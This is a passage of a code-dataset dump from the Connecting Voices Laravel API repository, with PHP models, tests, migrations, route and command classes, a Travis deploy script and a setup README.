"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait SettingMutators\n{\n /**\n * @param string $value\n * @return mixed\n */\n public function getValueAttribute(string $value)\n {\n return json_decode($value, true);\n }\n\n /**\n * @param mixed $value\n */\n public function setValueAttribute($value): void\n {\n $this->attributes['value'] = json_encode($value);\n }\n}\n"
},
{
"alpha_fraction": 0.539531946182251,
"alphanum_fraction": 0.5536580085754395,
"avg_line_length": 29.403846740722656,
"blob_id": "98b7aca3c565d113d5ff94427e9752b16b020a63",
"content_id": "f97cbd80040ef44f9a73cd8d930cca9dabed3474",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4743,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 156,
"path": "/tests/Unit/Services/AdminServiceTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Services;\n\nuse App\\Events\\Admin\\AdminCreated;\nuse App\\Events\\Admin\\AdminDeleted;\nuse App\\Events\\Admin\\AdminUpdated;\nuse App\\Models\\Admin;\nuse App\\Services\\AdminService;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Hash;\nuse Tests\\TestCase;\n\nclass AdminServiceTest extends TestCase\n{\n /** @test */\n public function it_creates_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $admin = $adminService->create([\n 'name' => 'John',\n 'email' => '[email protected]',\n 'phone' => '07700000000',\n 'password' => 'secret',\n ]);\n\n $this->assertDatabaseHas('admins', ['id' => $admin->id]);\n $this->assertDatabaseHas('users', ['id' => $admin->user_id]);\n $this->assertEquals('John', $admin->name);\n $this->assertEquals('[email protected]', $admin->user->email);\n $this->assertEquals('07700000000', $admin->phone);\n $this->assertTrue(Hash::check('secret', $admin->user->password));\n }\n\n /** @test */\n public function it_dispatches_an_event_when_created(): void\n {\n Event::fake([AdminCreated::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $admin = $adminService->create([\n 'name' => 'John',\n 'email' => '[email protected]',\n 'phone' => '07700000000',\n 'password' => 'secret',\n ]);\n\n Event::assertDispatched(\n AdminCreated::class,\n function (AdminCreated $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n\n /** @test */\n public function it_throws_exception_when_needed_values_for_creation_are_not_provided(): void\n {\n $this->expectException(\\ErrorException::class);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n $adminService->create([]);\n }\n\n /** @test */\n public function it_updates_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->update($admin, [\n 'name' => 'Foo Bar',\n 'phone' => '07777777777',\n 'email' => '[email protected]',\n 'password' => 'password',\n ]);\n\n $this->assertEquals('Foo Bar', $admin->name);\n $this->assertEquals('[email protected]', $admin->user->email);\n $this->assertEquals('07777777777', $admin->phone);\n $this->assertTrue(Hash::check('password', $admin->user->password));\n }\n\n /** @test */\n public function it_dispatches_an_event_when_updated(): void\n {\n Event::fake([AdminUpdated::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->update($admin, [\n 'name' => 'Foo Bar',\n 'phone' => '07777777777',\n 'email' => '[email protected]',\n 'password' => 'password',\n ]);\n\n Event::assertDispatched(\n AdminUpdated::class,\n function (AdminUpdated $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n\n /** @test */\n public function it_deletes_a_user_and_admin_record(): void\n {\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n 
$adminService->delete($admin);\n\n $this->assertDatabaseMissing('admins', ['id' => $admin->id]);\n $this->assertDatabaseMissing('users', ['id' => $admin->user_id]);\n }\n\n /** @test */\n public function it_dispatches_an_event_when_deleted(): void\n {\n Event::fake([AdminDeleted::class]);\n\n /** @var \\App\\Services\\AdminService $adminService */\n $adminService = resolve(AdminService::class);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n $adminService->delete($admin);\n\n Event::assertDispatched(\n AdminDeleted::class,\n function (AdminDeleted $event) use ($admin): bool {\n return $event->getAdmin()->is($admin);\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6458569765090942,
"alphanum_fraction": 0.646992027759552,
"avg_line_length": 24.171428680419922,
"blob_id": "3189dd4e4ec253d0e2b6004f8bc7a79a7c1f228b",
"content_id": "fa307457f60f632a0e55d170d434563e0dd3e73e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 881,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 35,
"path": "/database/migrations/2019_05_29_103217_create_notification_channels_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\DB;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateNotificationChannelsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('notification_channels', function (Blueprint $table): void {\n $table->string('channel')->primary();\n });\n\n $notificationChannelsPath = realpath(dirname(__DIR__)) . '/storage/notification_channels.json';\n\n DB::table('notification_channels')->insert(\n json_decode(file_get_contents($notificationChannelsPath), true)\n );\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('notification_channels');\n }\n}\n"
},
{
"alpha_fraction": 0.6630630493164062,
"alphanum_fraction": 0.6648648381233215,
"avg_line_length": 18.821428298950195,
"blob_id": "b2c63bb4b5d044ca9ce16460f769792309211b4b",
"content_id": "2a8398f00b05f79767c28821a3d32a8b5b032e44",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 555,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 28,
"path": "/app/Models/Relationships/FileTokenRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\File;\nuse App\\Models\\User;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\n\ntrait FileTokenRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function file(): BelongsTo\n {\n return $this->belongsTo(File::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function user(): BelongsTo\n {\n return $this->belongsTo(User::class);\n }\n}\n"
},
{
"alpha_fraction": 0.5776458978652954,
"alphanum_fraction": 0.578635036945343,
"avg_line_length": 23.071428298950195,
"blob_id": "20ebdd0a64362ae14f7390f99f59ccb7a94c7dee",
"content_id": "16a06efa0603503cb5b998ef28d589ba799fbb14",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2022,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 84,
"path": "/app/Providers/RouteServiceProvider.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Providers;\n\nuse App\\Models\\Admin;\nuse Illuminate\\Foundation\\Support\\Providers\\RouteServiceProvider as ServiceProvider;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Route;\n\nclass RouteServiceProvider extends ServiceProvider\n{\n /**\n * This namespace is applied to your controller routes.\n *\n * In addition, it is set as the URL generator's root namespace.\n *\n * @var string\n */\n protected $namespace = 'App\\Http\\Controllers';\n\n /**\n * Define your route model bindings, pattern filters, etc.\n */\n public function boot(): void\n {\n Route::bind('admin', function ($value): Admin {\n return Admin::find($value)\n ?? optional(request()->user('api'))->admin\n ?? abort(Response::HTTP_NOT_FOUND);\n });\n\n parent::boot();\n }\n\n /**\n * Define the routes for the application.\n */\n public function map(): void\n {\n $this->mapApiRoutes();\n\n $this->mapWebRoutes();\n\n $this->mapPassportRoutes();\n }\n\n /**\n * Define the \"web\" routes for the application.\n *\n * These routes all receive session state, CSRF protection, etc.\n */\n protected function mapWebRoutes(): void\n {\n Route::middleware('web')\n ->namespace($this->namespace)\n ->group(base_path('routes/web.php'));\n }\n\n /**\n * Define the \"api\" routes for the application.\n *\n * These routes are typically stateless.\n */\n protected function mapApiRoutes(): void\n {\n Route::middleware('api')\n ->namespace(\"{$this->namespace}\\V1\")\n ->group(base_path('routes/api.php'));\n }\n\n /**\n * Define the \"passport\" routes for the application.\n *\n * These routes are for OAuth.\n */\n protected function mapPassportRoutes(): void\n {\n Route::prefix('oauth')\n ->as('passport.')\n ->group(base_path('routes/passport.php'));\n }\n}\n"
},
{
"alpha_fraction": 0.566957414150238,
"alphanum_fraction": 0.5674704909324646,
"avg_line_length": 22.202381134033203,
"blob_id": "ea11648415e6bcbb37a3b64bf1bf3f11ae43dff5",
"content_id": "9b9f6009e2247458121f43343410caf6776b6ce2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1949,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 84,
"path": "/app/Models/Mutators/EndUserMutators.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Mutators;\n\ntrait EndUserMutators\n{\n /**\n * @param string|null $country\n * @return string|null\n */\n public function getCountryAttribute(?string $country): ?string\n {\n return is_string($country) ? decrypt($country) : null;\n }\n\n /**\n * @param string|null $country\n */\n public function setCountryAttribute(?string $country): void\n {\n $this->attributes['country'] = is_string($country)\n ? encrypt($country)\n : null;\n }\n\n /**\n * @param string|null $birthYear\n * @return int|null\n */\n public function getBirthYearAttribute(?string $birthYear): ?int\n {\n return is_string($birthYear) ? decrypt($birthYear) : null;\n }\n\n /**\n * @param int|null $birthYear\n */\n public function setBirthYearAttribute(?int $birthYear): void\n {\n $this->attributes['birth_year'] = is_int($birthYear)\n ? encrypt($birthYear)\n : null;\n }\n\n /**\n * @param string|null $gender\n * @return string|null\n */\n public function getGenderAttribute(?string $gender): ?string\n {\n return is_string($gender) ? decrypt($gender) : null;\n }\n\n /**\n * @param string|null $gender\n */\n public function setGenderAttribute(?string $gender): void\n {\n $this->attributes['gender'] = is_string($gender)\n ? encrypt($gender)\n : null;\n }\n\n /**\n * @param string|null $ethnicity\n * @return string|null\n */\n public function getEthnicityAttribute(?string $ethnicity): ?string\n {\n return is_string($ethnicity) ? decrypt($ethnicity) : null;\n }\n\n /**\n * @param string|null $ethnicity\n */\n public function setEthnicityAttribute(?string $ethnicity): void\n {\n $this->attributes['ethnicity'] = is_string($ethnicity)\n ? encrypt($ethnicity)\n : null;\n }\n}\n"
},
{
"alpha_fraction": 0.49185749888420105,
"alphanum_fraction": 0.49312976002693176,
"avg_line_length": 20.243244171142578,
"blob_id": "0610efc2cfb3b7b630c421d76a32ee87387f401f",
"content_id": "7504eff2ecaa9e74bf4e4ee069d79287b705d7d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3930,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 185,
"path": "/app/Console/Commands/Cv/Make/ModelCommand.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Console\\Commands\\Cv\\Make;\n\nuse Illuminate\\Console\\Command;\n\nclass ModelCommand extends Command\n{\n /**\n * The name and signature of the console command.\n *\n * @var string\n */\n protected $signature = 'cv:make:model \n {name : The name of the class}';\n\n /**\n * The console command description.\n *\n * @var string\n */\n protected $description = 'Create a new Eloquent model class along with useful traits';\n\n /**\n * Execute the console command.\n *\n * @throws \\Exception\n */\n public function handle(): void\n {\n $name = $this->argument('name');\n\n if (!$this->checkIfModelExists($name)) {\n return;\n }\n\n $this->makeModelClass($name);\n $this->makeMutatorsTrait($name);\n $this->makeRelationshipsTrait($name);\n $this->makeScopesTrait($name);\n\n $this->info(\"{$name} model and traits created successfully.\");\n }\n\n /**\n * @param string $name\n * @return bool\n */\n protected function checkIfModelExists(string $name): bool\n {\n if (is_file(app_path(\"Models/{$name}.php\"))) {\n $this->error(\"{$name} model already exists.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Mutators/{$name}Mutators.php\"))) {\n $this->error(\"{$name} mutators already exist.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Relationships/{$name}Relationships.php\"))) {\n $this->error(\"{$name} relationships already exist.\");\n\n return false;\n }\n\n if (is_file(app_path(\"Models/Scopes/{$name}Scopes.php\"))) {\n $this->error(\"{$name} scopes already exist.\");\n\n return false;\n }\n\n return true;\n }\n\n /**\n * @param string $name\n */\n protected function makeModelClass(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models;\n \n use GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\n \n class {$name} extends BaseModel\n {\n use Mutators\\\\{$name}Mutators;\n use Relationships\\\\{$name}Relationships;\n use Scopes\\\\{$name}Scopes;\n \n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/{$name}.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeMutatorsTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Mutators;\n \n trait {$name}Mutators\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Mutators/{$name}Mutators.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeRelationshipsTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Relationships;\n \n trait {$name}Relationships\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Relationships/{$name}Relationships.php\"),\n $contents\n );\n }\n\n /**\n * @param string $name\n */\n protected function makeScopesTrait(string $name): void\n {\n $contents = <<<EOT\n <?php\n \n declare(strict_types=1);\n \n namespace App\\Models\\Scopes;\n \n trait {$name}Scopes\n {\n //\n }\n \n EOT;\n\n file_put_contents(\n app_path(\"Models/Scopes/{$name}Scopes.php\"),\n $contents\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7150423526763916,
"alphanum_fraction": 0.7150423526763916,
"avg_line_length": 27.606060028076172,
"blob_id": "a3fcffb45414e0f7290e7ff07538d300a6788b44",
"content_id": "7d1ba97c22b4c9ae47800df196f9b42803ca23e0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 944,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 33,
"path": "/.travis/deploy.sh",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Requires the following environment variables:\n# $TRAVIS_BRANCH = The name of the git branch that the build is running on.\n# REPO_URI = The URI of the ECR repo to push to.\n# CLUSTER = The name of the ECS cluster to deploy to.\n\n# Bail out on first error.\nset -e\n\n# Get the environment from the branch.\ncase ${TRAVIS_BRANCH} in\n master )\n ENVIRONMENT=production\n ;;\n develop )\n ENVIRONMENT=staging\n ;;\nesac\n\n# Declare the configuration variables for the deployment.\necho \"Setting deployment configuration for ${DEPLOYMENT}...\"\nexport ENV_SECRET_ID=\".env.api.${ENVIRONMENT}\"\nexport PUBLIC_KEY_SECRET_ID=\"oauth-public.key.${ENVIRONMENT}\"\nexport PRIVATE_KEY_SECRET_ID=\"oauth-private.key.${ENVIRONMENT}\"\n\n# Build the image.\n./docker/build.sh\n\n# Deploy the update to the services.\nSERVICE=\"api\" ./docker/deploy.sh\nSERVICE=\"scheduler\" ./docker/deploy.sh\nSERVICE=\"queue-worker\" ./docker/deploy.sh\n"
},
{
"alpha_fraction": 0.4979960024356842,
"alphanum_fraction": 0.4989979863166809,
"avg_line_length": 23.341463088989258,
"blob_id": "75e975f862637e9faff4f178a7ba8e773e672c48",
"content_id": "8df8a024130cdb57430889ae90cde37db50f86c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 998,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 41,
"path": "/app/Http/Requests/File/DownloadFileRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\File;\n\nuse App\\Rules\\ValidFileToken;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass DownloadFileRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n /** @var \\App\\Models\\File $file */\n $file = $this->route('file');\n\n /** @var \\App\\Models\\Admin|null $admin */\n $admin = optional($this->user('api'))->admin;\n\n return [\n 'token' => [\n 'bail',\n Rule::requiredIf(function (): bool {\n /** @var \\App\\Models\\File $file */\n $file = $this->route('file');\n\n return $file->isPrivate();\n }),\n 'string',\n 'exists:file_tokens,id',\n new ValidFileToken($file, $admin),\n ],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6768447756767273,
"alphanum_fraction": 0.6793892979621887,
"avg_line_length": 18.649999618530273,
"blob_id": "257139ab315648398dc94b1952a5e30def6faef7",
"content_id": "f457ca2cac8d5cd8584cc02a35b10a6ad4386af3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 20,
"path": "/app/Exceptions/ExporterNotFoundException.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Exceptions;\n\nuse RuntimeException;\n\nclass ExporterNotFoundException extends RuntimeException\n{\n /**\n * ExporterNotFoundException constructor.\n *\n * @param string $exporterClass\n */\n public function __construct(string $exporterClass)\n {\n parent::__construct(\"Exporter class [{$exporterClass}] not found.\");\n }\n}\n"
},
{
"alpha_fraction": 0.6598916053771973,
"alphanum_fraction": 0.6612465977668762,
"avg_line_length": 18.421052932739258,
"blob_id": "ee7d4d75e96dc23d1209d53a825cac49a3082c56",
"content_id": "49b79d464c8f468a836af196432f1bbf23c60371",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 738,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 38,
"path": "/app/Events/Contribution/ContributionApproved.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Contribution;\n\nuse App\\Models\\Contribution;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass ContributionApproved\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Contribution\n */\n protected $contribution;\n\n /**\n * ContributionCreated constructor.\n *\n * @param \\App\\Models\\Contribution $contribution\n */\n public function __construct(Contribution $contribution)\n {\n $this->contribution = $contribution;\n }\n\n /**\n * @return \\App\\Models\\Contribution\n */\n public function getContribution(): Contribution\n {\n return $this->contribution;\n }\n}\n"
},
{
"alpha_fraction": 0.6800618171691895,
"alphanum_fraction": 0.6816074252128601,
"avg_line_length": 20.566667556762695,
"blob_id": "daffab9d06673e22efdfe91f58210dee79c0da6a",
"content_id": "24737f89ffc58393b32d820b3074273f3980ab3b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 647,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 30,
"path": "/app/Http/Controllers/DocsController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse App\\Docs\\OpenApi;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Contracts\\View\\View;\n\nclass DocsController extends WebController\n{\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function index(): View\n {\n return view('docs.index');\n }\n\n /**\n * @throws \\ReflectionException\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\Illuminate\\Contracts\\Support\\Responsable\n */\n public function openApi(): Responsable\n {\n return OpenApi::create();\n }\n}\n"
},
{
"alpha_fraction": 0.6898733973503113,
"alphanum_fraction": 0.6919831037521362,
"avg_line_length": 21.571428298950195,
"blob_id": "c2b4ee7e290f5b57f5f612278c92fabb1218d4ee",
"content_id": "1280d07929fefaec202b0612748eea735dabe0d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 474,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 21,
"path": "/app/Docs/Tags/EndUsersTag.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Tags;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Tag;\n\nclass EndUsersTag extends Tag\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Tag\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->name('End Users');\n }\n}\n"
},
{
"alpha_fraction": 0.6961832046508789,
"alphanum_fraction": 0.6977099180221558,
"avg_line_length": 21.586206436157227,
"blob_id": "46ff6df9835574aaa0f84718e30368878ffc05ce",
"content_id": "60350cc716937bbabfdedf43164b23dd5cb2c473",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 655,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 29,
"path": "/app/Models/Relationships/ContributionRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\EndUser;\nuse App\\Models\\Tag;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsTo;\nuse Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany;\n\ntrait ContributionRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsTo\n */\n public function endUser(): BelongsTo\n {\n return $this->belongsTo(EndUser::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\BelongsToMany\n */\n public function tags(): BelongsToMany\n {\n return $this->belongsToMany(Tag::class, 'contribution_tag');\n }\n}\n"
},
{
"alpha_fraction": 0.6181150674819946,
"alphanum_fraction": 0.6193390488624573,
"avg_line_length": 19.94871711730957,
"blob_id": "86e3cd4902eafd8ee6feb56c8890c37979dea2cb",
"content_id": "32c379d3c9d520922bd8695ea03df037c4789d46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 817,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 39,
"path": "/app/Http/Responses/ResourceDeletedResponse.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Responses;\n\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\JsonResponse;\n\nclass ResourceDeletedResponse implements Responsable\n{\n /**\n * @var string\n */\n protected $resource;\n\n /**\n * ResourceDeletedResponse constructor.\n *\n * @param string $resource\n */\n public function __construct(string $resource)\n {\n $this->resource = $resource;\n }\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function toResponse($request): JsonResponse\n {\n return response()->json([\n 'message' => \"The {$this->resource} has been deleted.\",\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.7464519739151001,
"alphanum_fraction": 0.7486353516578674,
"avg_line_length": 23.756755828857422,
"blob_id": "73f05de05cec1581a6420d8d464efa5a72199cf2",
"content_id": "421664937ae16bff1f63483a0f5b37eb989bd399",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3664,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 148,
"path": "/README.md",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Connecting Voices - API\n\nThe main API component for the Connecting Voices platform.\n\n## Getting started\n\nThese instructions will get you a copy of the project up and running on your \nlocal machine for development and testing purposes. See deployment for notes on \nhow to deploy the project on a live system.\n\n### Prerequisites\n\nTo run this project, you must have the following installed on your host machine:\n\n* [Docker](https://docs.docker.com/install/)\n\n### The helper script\n\nTo abstract the long commands needed to work with Docker Compose, a helper \nscript called `develop` has been created at the root of the project. This is \nreferenced throughout the rest of this guide and should be used for day-to-day \ntasks when developing.\n\nIt essentially just proxies commands to the relevant docker containers. Feel \nfree to add commands when necessary.\n\n### Installing\n\nStart by building the Docker image and spinning up the development environment:\n\n```bash\n./develop build\n./develop up -d\n```\n\nAt this point you must then download the dependencies and compile the static \nassets:\n\n```bash\n# Install dependencies.\n./develop composer install\n./develop npm install\n\n# Either do a dingle compilation.\n./develop npm run dev\n\n# Or, run a watcher for compilation upon file change.\n./develop npm run watch\n```\n\nNext, configure the environment file:\n\n```bash\n# Copy the example file.\ncp .env.example .env\n\n# Fill out the details needed.\nvim .env\n```\n\nThen generate an application key:\n\n```bash\n./develop art key:generate\n```\n\nNow run the database migrations:\n\n```bash\n# Optionally append \"--seed\" if you want test data to work with.\n./develop art migrate [--seed]\n```\n\nCreate a user for yourself to login with:\n\n```bash\n# If you don't specify a password, one will be generated and outputted for you.\n./develop art cv:make:admin <name> <email> <phone> [--password=secret] \n```\n\nAnd finally create OAuth clients for trusted apps:\n\n```bash\n# Password grant clients (frontend webapp):\n./develop art passport:client --password\n\n# Authorization grant clients (admin webapp):\n./develop art cv:make:client \"Connecting Voices Admin\" \"http://localhost:3000/auth/callback\"\n```\n\nYou should now be able to login to the API, and the admin web app once you've \nset it up.\n\n## Running the tests\n\nTo run the test suite you can use the following commands:\n\n```bash\n# To run both style and unit tests.\ncomposer test\n\n# To run only style tests.\ncomposer test:style\n\n# To run only unit tests.\ncomposer test:unit\n```\n\nIf you receive any errors from the style tests, you can automatically fix most, \nif not all of the issues with the following command:\n\n```bash\ncomposer fix:style\n```\n\n## Deployment\n\nDeployment is all automated through Travis CI. Pushes to the `develop` branch \nwill automatically deploy to staging, whereas pushes to `master` will \nautomatically deploy to production.\n\nIt is important to tag any releases to production using [SemVer](http://semver.org/).\n\n## Built with\n\n* [Laravel 5.8](https://laravel.com/docs/5.8) - The PHP framework used\n\n## Contributing\n\nPlease read [CONTRIBUTING.md](CONTRIBUTING.md) for details on our code of \nconduct, and the process for submitting pull requests to us.\n\n## Versioning\n\nWe use [SemVer](http://semver.org/) for versioning. For the versions available, \nsee the [tags on this repository](https://github.com/hearing-voices-network/api/tags). 
\n\n## Authors\n\n* [Ayup Digital](https://ayup.agency)\n\nSee also the list of [contributors](https://github.com/hearing-voices-network/api/contributors) \nwho participated in this project.\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) \nfile for details.\n"
},
{
"alpha_fraction": 0.6152157783508301,
"alphanum_fraction": 0.6159473061561584,
"avg_line_length": 34.0512809753418,
"blob_id": "f5a2b8a8de1ddd5626a4501588a663120e9fda76",
"content_id": "8847fcce9a4a14e37aad153bcd01cd661519b166",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1367,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 39,
"path": "/app/Docs/Paths/Files/FilesDownloadPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
